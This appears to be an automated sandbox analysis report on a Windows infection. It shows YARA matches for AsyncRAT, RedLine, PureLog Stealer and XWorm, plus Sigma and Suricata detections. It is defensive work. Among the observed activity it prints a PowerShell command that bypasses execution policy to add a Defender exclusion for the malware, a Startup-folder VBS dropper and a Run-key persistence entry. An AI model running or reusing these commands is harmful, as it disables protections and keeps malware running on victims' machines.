9.2.RegSvcs.exe.2e57738.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x115ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11689:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1179e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1 0x1129a:$cnc4: POST / HTTP/1.1
9.2.RegSvcs.exe.3eaebc0.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.3eaebc0.8.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x22ec3:$gen01: ChromeGetRoamingName 0x22ee8:$gen02: ChromeGetLocalName 0x22f2b:$gen03: get_UserDomainName 0x26dc4:$gen04: get_encrypted_key 0x25b43:$gen05: browserPaths 0x25e19:$gen06: GetBrowsers 0x25701:$gen07: get_InstalledInputLanguages 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x4a848:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x278c6:$spe9: wallet 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x1fbc1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x1fd92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x1ffe5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x202d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
9.2.RegSvcs.exe.2a20f3e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.3f45010.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.3f45010.6.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296c6:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
9.2.RegSvcs.exe.3ef9df0.9.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.3ef9df0.9.raw.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296c6:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
9.2.RegSvcs.exe.2e57738.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
9.2.RegSvcs.exe.2e57738.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x4add:$str01: $VB$Local_Port 0x4ace:$str02: $VB$Local_Host 0x4d53:$str03: get_Jpeg 0x47b6:$str04: get_ServicePack 0x58ea:$str05: Select * from AntivirusProduct 0x5ae8:$str06: PCRestart 0x5afc:$str07: shutdown.exe /f /r /t 0 0x5bae:$str08: StopReport 0x5b84:$str09: StopDDos 0x5c7a:$str10: sendPlugin 0x5dfa:$str12: -ExecutionPolicy Bypass -File " 0x5f23:$str13: Content-length: 5235
9.2.RegSvcs.exe.2e57738.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6190:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x622d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6342:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5e3e:$cnc4: POST / HTTP/1.1
9.2.RegSvcs.exe.5300ee8.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.2e60d94.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
9.2.RegSvcs.exe.2e60d94.4.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x79ae:$str08: StopReport 0x7984:$str09: StopDDos 0x7a7a:$str10: sendPlugin 0x7bfa:$str12: -ExecutionPolicy Bypass -File " 0x7d23:$str13: Content-length: 5235
9.2.RegSvcs.exe.2e60d94.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1
9.2.RegSvcs.exe.3f45010.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.3f45010.6.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x22ec3:$gen01: ChromeGetRoamingName 0x22ee8:$gen02: ChromeGetLocalName 0x22f2b:$gen03: get_UserDomainName 0x26dc4:$gen04: get_encrypted_key 0x25b43:$gen05: browserPaths 0x25e19:$gen06: GetBrowsers 0x25701:$gen07: get_InstalledInputLanguages 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x278c6:$spe9: wallet 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x1fbc1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x1fd92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x1ffe5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x202d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
10.0.build.exe.ef0000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.0.build.exe.ef0000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296c6:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
9.2.RegSvcs.exe.5300000.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.3dfb390.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0xff21:$str01: $VB$Local_Port 0x1957d:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0xff12:$str02: $VB$Local_Host 0x1956e:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x10197:$str03: get_Jpeg 0x197f3:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0xfbfa:$str04: get_ServicePack 0x19256:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x10d2e:$str05: Select * from AntivirusProduct 0x1a38a:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x10f2c:$str06: PCRestart 0x1a588:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x10f40:$str07: shutdown.exe /f /r /t 0 0x1a59c:$str07: shutdown.exe /f /r /t 0
9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x115d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1ac30:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11671:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1accd:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11786:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1ade2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1 0x11282:$cnc4: POST / HTTP/1.1 0x1a8de:$cnc4: POST / HTTP/1.1
11.0.XClient.exe.cf0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.0.XClient.exe.cf0000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x79ae:$str08: StopReport 0x7984:$str09: StopDDos 0x7a7a:$str10: sendPlugin 0x7bfa:$str12: -ExecutionPolicy Bypass -File " 0x7d23:$str13: Content-length: 5235
11.0.XClient.exe.cf0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1
9.2.RegSvcs.exe.3ef9df0.9.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.RegSvcs.exe.3ef9df0.9.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x22ec3:$gen01: ChromeGetRoamingName 0x22ee8:$gen02: ChromeGetLocalName 0x22f2b:$gen03: get_UserDomainName 0x26dc4:$gen04: get_encrypted_key 0x25b43:$gen05: browserPaths 0x25e19:$gen06: GetBrowsers 0x25701:$gen07: get_InstalledInputLanguages 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x4a838:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x278c6:$spe9: wallet 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7304, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7464, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7304, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7464, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7304, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7464, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , ProcessId: 7612, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7304, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7464, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3964, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" , ProcessId: 7612, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\XClient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\XClient.exe, ParentProcessId: 7304, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe', ProcessId: 7464, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\differences\niellist.exe, ProcessId: 5580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-21T15:08:48.487469+0100	2051649	1	A Network Trojan was detected	192.168.2.4	54634	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-21T15:08:47.382896+0100	2051648	1	A Network Trojan was detected	192.168.2.4	55274	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-21T15:08:44.162819+0100	2018141	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.4	49717	TCP
2025-03-21T15:08:47.425175+0100	2018141	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.4	49722	TCP
2025-03-21T15:10:17.988204+0100	2018141	1	A Network Trojan was detected	54.169.144.97	80	192.168.2.4	49751	TCP
2025-03-21T15:10:19.304014+0100	2018141	1	A Network Trojan was detected	18.142.91.111	80	192.168.2.4	49752	TCP
2025-03-21T15:10:23.192251+0100	2018141	1	A Network Trojan was detected	34.245.175.187	80	192.168.2.4	49760	TCP
2025-03-21T15:10:27.828515+0100	2018141	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.4	49767	TCP
2025-03-21T15:10:28.020682+0100	2018141	1	A Network Trojan was detected	54.85.87.184	80	192.168.2.4	49768	TCP
2025-03-21T15:10:32.499617+0100	2018141	1	A Network Trojan was detected	34.229.166.50	80	192.168.2.4	49776	TCP
2025-03-21T15:10:34.646334+0100	2018141	1	A Network Trojan was detected	13.213.51.196	80	192.168.2.4	49779	TCP
2025-03-21T15:10:38.550605+0100	2018141	1	A Network Trojan was detected	52.26.80.133	80	192.168.2.4	49787	TCP
2025-03-21T15:10:46.946069+0100	2018141	1	A Network Trojan was detected	52.212.150.54	80	192.168.2.4	49795	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-21T15:08:44.162819+0100	2037771	1	A Network Trojan was detected	52.11.240.239	80	192.168.2.4	49717	TCP
2025-03-21T15:08:47.425175+0100	2037771	1	A Network Trojan was detected	3.229.117.57	80	192.168.2.4	49722	TCP
2025-03-21T15:10:17.988204+0100	2037771	1	A Network Trojan was detected	54.169.144.97	80	192.168.2.4	49751	TCP
2025-03-21T15:10:19.304014+0100	2037771	1	A Network Trojan was detected	18.142.91.111	80	192.168.2.4	49752	TCP
2025-03-21T15:10:23.192251+0100	2037771	1	A Network Trojan was detected	34.245.175.187	80	192.168.2.4	49760	TCP
2025-03-21T15:10:27.828515+0100	2037771	1	A Network Trojan was detected	52.43.119.120	80	192.168.2.4	49767	TCP
2025-03-21T15:10:28.020682+0100	2037771	1	A Network Trojan was detected	54.85.87.184	80	192.168.2.4	49768	TCP
2025-03-21T15:10:32.499617+0100	2037771	1	A Network Trojan was detected	34.229.166.50	80	192.168.2.4	49776	TCP
